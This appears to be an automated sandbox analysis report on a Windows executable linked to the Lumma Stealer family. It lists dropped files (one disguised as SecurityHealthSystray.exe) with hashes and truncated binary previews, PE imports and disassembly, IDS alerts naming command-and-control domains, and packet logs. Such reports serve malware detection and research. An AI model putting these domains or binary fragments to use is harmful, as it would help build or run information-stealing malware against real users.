Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

C:\Windows\Speech\physmeme.exe

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	370176
Entropy (8bit):	7.990824056166435
Encrypted:	true
SSDEEP:	6144:uFEE0IJwfawOmaDOEFI2FSCsPOjygLxkxweCyxORzX7rIh0uUWJZtwCiDMf+egqx:uFElvH+KEFLSvVAL7rqDtAIfiq4
MD5:	D6EDF37D68DA356237AE14270B3C7A1A
SHA1:	37FCDB2A0FB6949E710A7E64E181993FD4CBCB29
SHA-256:	D5F6F3242C601E85EEDFF04CD45947F7890E908E51C57F90521EED59C8088B4B
SHA-512:	01CE470A7D19FB9E139C038FF5DD30B6D85409A87B298AE9D3106B5E2EF8712C0D7FC7E4587886DEE47DB040033B9D2D591A0CAFC0001461A0DC07338F0BAA21
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W.f................................. ........@.. ....................................`.................................l...O...................................4................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......p................................................................9m.[...{....V._A.._..X..[m.'..#Q.......[..+H.<..fZ..\|.....m&......y..;KR....7..S..k.m?.8..ID&.!0%N!\.\..L^...0\.....j\|.M.........M.;..q..UO..!'..%. d.E.u......Q-w.$I...X...0d......f.$\|(.gE.N...3.J..T.?.q..\.yX:..W6...t..d.......(.E..n..K.J050....=I3-.x.p.......&{#.,..Vxb.G\.=$...}.C.fgl..`.I.yZ..?.$.'J)....K..............TV.@,...r..q....+....2<ILOS....n<..o.T.~.d:... ..z.>...._.H...

C:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.977686017571788
Encrypted:	false
SSDEEP:	48:6OpnPtPWM7Jt8Bs3FJsdcV4MKe27iEc3s0J9vqBH6OulajfqXSfbNtm:5PBDPc+Vx9Mrlc9vkkcjRzNt
MD5:	5D5AE3F10CAADC375587589DABF8F147
SHA1:	782098228A63E5E861CDEED788F9B46D78A5E8C9
SHA-256:	EAA1E077716519918614BA7BF0B722BDFAE9D7E81333FF635263838984C6D291
SHA-512:	FA217BC6125D633A63063038F0B13B3F1FE14D8FF7DA54D8329AF101E0E98329245724DF76E83ABCAD6CF9DB89471920861BE2ADF3FB89FA30FF4DBA1B3D4E08
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................p'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..H.............................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID...(... ...#Blob...........WU........%3................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\Speech\physmeme.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	2.5600289361122233
Encrypted:	false
SSDEEP:	3:oWEMo6vvRya:oWEpKvD
MD5:	198AA7622D86723F12D39AA38A10C97F
SHA1:	B3FE9A9637FAF01EFCFCB92AB288F7C91CE87F63
SHA-256:	88866B26B5F228DBEF268709E063E29F5BD89C114921148BEAA92FC2EACD2E2D
SHA-512:	8452029C020F524303144260D478F8F15E2AD5A4BB3F65DB06B62DEA568FAD165949A0FFDE119D7F5C4CA58E87AF660C35CCD54CE78D82BDEB01F6E84E3ED5BA
Malicious:	false
Preview:	012340..1..2..3..4.....

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.859827078534988
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FX5cUzj62Y6rMQpf6aNrv:Vx993DEU+c6G51Qpis
MD5:	E477C200E14E88AF5E3466E171CFBBEF
SHA1:	94D5CBEF534389649116BF096C61BA9D29020939
SHA-256:	C7429FB158C8FBA026899AD861AE291675EE6CFE9019DD37C7F9B8C65C2BD801
SHA-512:	DEDFF89DA333B84975BDBD6890269A3976CED8C7A426598AB5E581384DA639839621B01A6008C8635E712654D9CC8BFE03BC2E7642863864CC38A53D3E52EE87
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 30/09/2024 15:33:20..15:33:20, error: 0x800705B4.15:33:26, error: 0x800705B4.

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.726754074912773
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	gh3zRWl4or.exe
File size:	637'440 bytes
MD5:	b172feb05a0515d00442f6ef11b167bf
SHA1:	7b68a6d3278644d6ffe8016b582141b67826eb96
SHA256:	77a592b9f5d0706eb93369d646deb8915303bdc725619c24378dfd3db1ca2ed2
SHA512:	d4fe807db84d67011fafdd3543d87fadfa589997707337f0d78a79cbf5808447e168f50f00480b20aee86ad66c9ce1260bbc3723668b11de62d8a94d58bc040a
SSDEEP:	12288:oKhnHFWGP9njqa8UxCj2AqeMQmHnLb6WfI:hlWGlWa8uGKFHnLb5fI
TLSH:	41D49D5973A58BA4D276613894BBA317F737B80817358ACB63D440642FE23E05EBB713
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..aV..aV..aV......aV...W..aV...U..aV...R..aV...S..aV...W..aV..aW..`V..._..aV......aV...T..aV.Rich.aV........................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14004d22c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0566B [Sun Sep 22 17:39:55 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	11c012ef8b8b753a6c7dfac749804464

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FA8486C858Ch
dec eax
add esp, 28h
jmp 00007FA8486C7EB7h
int3
int3
dec eax
mov dword ptr [esp+10h], ebx
dec eax
mov dword ptr [esp+18h], esi
push ebp
push edi
inc ecx
push esi
dec eax
mov ebp, esp
dec eax
sub esp, 10h
xor eax, eax
xor ecx, ecx
cpuid
inc esp
mov eax, ecx
inc esp
mov edx, edx
inc ecx
xor edx, 49656E69h
inc ecx
xor eax, 6C65746Eh
inc esp
mov ecx, ebx
inc esp
mov esi, eax
xor ecx, ecx
mov eax, 00000001h
cpuid
inc ebp
or edx, eax
mov dword ptr [ebp-10h], eax
inc ecx
xor ecx, 756E6547h
mov dword ptr [ebp-0Ch], ebx
inc ebp
or edx, ecx
mov dword ptr [ebp-08h], ecx
mov edi, ecx
mov dword ptr [ebp-04h], edx
jne 00007FA8486C809Dh
dec eax
or dword ptr [00030DFDh], FFFFFFFFh
and eax, 0FFF3FF0h
dec eax
mov dword ptr [00030DE5h], 00008000h
cmp eax, 000106C0h
je 00007FA8486C806Ah
cmp eax, 00020660h
je 00007FA8486C8063h
cmp eax, 00020670h
je 00007FA8486C805Ch
add eax, FFFCF9B0h
cmp eax, 20h
jnbe 00007FA8486C8066h
dec eax
mov ecx, 00010001h
add dword ptr [eax], eax
add byte ptr [eax], al
dec eax
bt ecx, eax
jnc 00007FA8486C8056h
inc esp
mov eax, dword ptr [0004D27Fh]
inc ecx
or eax, 01h
inc esp
mov dword ptr [0004D274h], eax

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7b7e4	0x1a4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9e000	0x1e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x9b000	0x2dfc	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9f000	0x240	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x751b0	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x75280	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x75070	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x50000	0x850	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4e3b7	0x4e400	c333380fa69589bce4c2278b231e8813	False	0.49129517771565495	data	6.500226352638178	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x50000	0x2dc24	0x2de00	5dfff03f906647692a41735b724f8ad0	False	0.7467643051771117	OpenPGP Secret Key	6.927876005850988	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7e000	0x1cca8	0x1c000	539022a133f3d912fb0c10fe1d3ffa7b	False	0.4547119140625	data	5.38142521884376	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x9b000	0x2dfc	0x2e00	3971859f0ef1b28917191e217d625325	False	0.47019361413043476	data	5.750183579904415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x9e000	0x1e8	0x200	47073ab0f41674365afed1b0d7cc6cd5	False	0.54296875	data	4.768131151703051	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9f000	0x240	0x400	2168621d28398eccf66ad0e9459ab6ff	False	0.39453125	data	3.6122178639287137	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x9e060	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
d3d9.dll	Direct3DCreate9Ex
KERNEL32.dll	VirtualFree, GetCurrentProcess, OutputDebugStringA, DeviceIoControl, VirtualAlloc, Thread32Next, Thread32First, CreateFileW, GetCurrentThreadId, GetModuleHandleA, CreateToolhelp32Snapshot, MultiByteToWideChar, Sleep, GetLastError, GetCurrentThread, LoadLibraryA, Process32Next, CloseHandle, K32GetModuleBaseNameA, CreateThread, HeapSetInformation, GetThreadContext, GetProcAddress, GetCurrentProcessId, GetProcessHeap, WideCharToMultiByte, lstrcmpiA, K32EnumProcessModules, GetTickCount, OpenThread, IsDebuggerPresent, CheckRemoteDebuggerPresent, SetLastError, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, VirtualProtect, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetModuleHandleW, GetSystemTimeAsFileTime, InitializeSListHead, LocalFree, FormatMessageA, GetLocaleInfoEx, FindClose, FindFirstFileW, GetFileAttributesExW, AreFileApisANSI, GetFileInformationByHandleEx, Process32First, QueryPerformanceCounter, QueryPerformanceFrequency, GlobalUnlock, GlobalLock, GlobalFree, GlobalAlloc, ReleaseSRWLockExclusive, UnhandledExceptionFilter
USER32.dll	GetActiveWindow, SetClipboardData, ScreenToClient, LoadCursorA, GetKeyState, SendInput, UpdateWindow, GetClipboardData, EmptyClipboard, RegisterClassExA, FindWindowA, GetDesktopWindow, PeekMessageA, LoadIconA, mouse_event, TranslateMessage, ClientToScreen, CreateWindowExA, DefWindowProcA, SetCursor, GetForegroundWindow, MessageBoxA, SetWindowLongA, CloseClipboard, OpenClipboard, GetCursorPos, SetCursorPos, GetAsyncKeyState, ShowWindow, GetSystemMetrics, SetWindowPos, SetLayeredWindowAttributes, GetClientRect, DestroyWindow, GetWindowRect, GetWindow, DispatchMessageA
ADVAPI32.dll	OpenProcessToken, GetTokenInformation
IMM32.dll	ImmReleaseContext, ImmSetCompositionWindow, ImmGetContext
MSVCP140.dll	_Query_perf_frequency, ??1_Lockit@std@@QEAA@XZ, ??0_Lockit@std@@QEAA@H@Z, ?_Throw_Cpp_error@std@@YAXH@Z, ?uncaught_exceptions@std@@YAHXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A, ?_Winerror_map@std@@YAHH@Z, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z, ?_Random_device@std@@YAIXZ, ?_Xlength_error@std@@YAXPEBD@Z, ?_Syserror_map@std@@YAPEBDH@Z, _Query_perf_counter, _Thrd_detach, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ??Bid@locale@std@@QEAA_KXZ
ntdll.dll	RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind
dwmapi.dll	DwmExtendFrameIntoClientArea
VCRUNTIME140_1.dll	__CxxFrameHandler4
VCRUNTIME140.dll	__std_terminate, memchr, strstr, memcmp, memcpy, __std_exception_destroy, __std_exception_copy, memmove, __current_exception, __current_exception_context, __C_specific_handler, _CxxThrowException, memset
api-ms-win-crt-stdio-l1-1-0.dll	__p__commode, _fseeki64, fsetpos, ungetc, _get_stream_buffer_pointers, setvbuf, fgetpos, fclose, __acrt_iob_func, __stdio_common_vsnprintf_s, fflush, fgetc, ftell, fputc, _set_fmode, fseek, __stdio_common_vsprintf_s, __stdio_common_vfprintf, __stdio_common_vsscanf, fread, __stdio_common_vsprintf, _wfopen, fwrite
api-ms-win-crt-string-l1-1-0.dll	strncpy, isprint, strcmp, _stricmp
api-ms-win-crt-utility-l1-1-0.dll	qsort, rand
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, _callnewh, free, malloc
api-ms-win-crt-convert-l1-1-0.dll	atof
api-ms-win-crt-runtime-l1-1-0.dll	system, _beginthreadex, terminate, abort, _invalid_parameter_noinfo_noreturn, _register_thread_local_exe_atexit_callback, _c_exit, __p___argv, __p___argc, _exit, _initterm_e, _initterm, _get_initial_narrow_environment, _set_app_type, _seh_filter_exe, _cexit, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, exit
api-ms-win-crt-math-l1-1-0.dll	atan2, atan2f, ceilf, cosf, asin, fmodf, pow, tanf, powf, sqrtf, __setusermatherr, floorf, sinf, sqrt
api-ms-win-crt-filesystem-l1-1-0.dll	_unlock_file, _lock_file
api-ms-win-crt-locale-l1-1-0.dll	___lc_codepage_func, _configthreadlocale
SHELL32.dll	ShellExecuteW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-30T18:19:14.537928+0200	2056172	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)	1	192.168.2.7	49437	1.1.1.1	53	UDP
2024-09-30T18:19:15.013492+0200	2056172	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)	1	192.168.2.7	65263	1.1.1.1	53	TCP
2024-09-30T18:19:15.018204+0200	2056054	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)	1	192.168.2.7	59776	1.1.1.1	53	UDP
2024-09-30T18:19:15.031016+0200	2056040	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)	1	192.168.2.7	52053	1.1.1.1	53	UDP
2024-09-30T18:19:15.051876+0200	2056056	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)	1	192.168.2.7	61249	1.1.1.1	53	UDP
2024-09-30T18:19:15.063865+0200	2056036	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)	1	192.168.2.7	63135	1.1.1.1	53	UDP
2024-09-30T18:19:15.076598+0200	2056058	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)	1	192.168.2.7	59487	1.1.1.1	53	UDP
2024-09-30T18:19:15.089811+0200	2056046	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)	1	192.168.2.7	60439	1.1.1.1	53	UDP
2024-09-30T18:19:15.102262+0200	2056042	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)	1	192.168.2.7	58230	1.1.1.1	53	UDP
2024-09-30T18:19:15.114119+0200	2056052	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)	1	192.168.2.7	50957	1.1.1.1	53	UDP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 18:19:08.871608019 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:08.871671915 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:08.871736050 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:08.881886005 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:08.881902933 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.370851994 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.371006012 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.375212908 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.375226974 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.375595093 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.378087044 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.423398972 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.508512020 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.508580923 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.508651018 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.508651972 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.508665085 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.508708000 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.508719921 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.508759975 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.508799076 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.508805990 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.508944035 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.508981943 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.508982897 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.508994102 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.509028912 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.509036064 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.515917063 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.515983105 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.515993118 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.561803102 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.596908092 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.597013950 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.597084045 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.597098112 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.597584963 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.597635984 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.597647905 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.597898960 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.597944975 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.597951889 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.597995043 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.598035097 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.598043919 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.598371983 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.598414898 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.598423004 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.598804951 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.598849058 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.598856926 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.599044085 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.599086046 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.599096060 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.599677086 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.599714994 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.599718094 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.599726915 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.599764109 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.600524902 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.601056099 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.601093054 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.601099014 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.601109028 CEST	443	49701	188.114.96.3	192.168.2.7
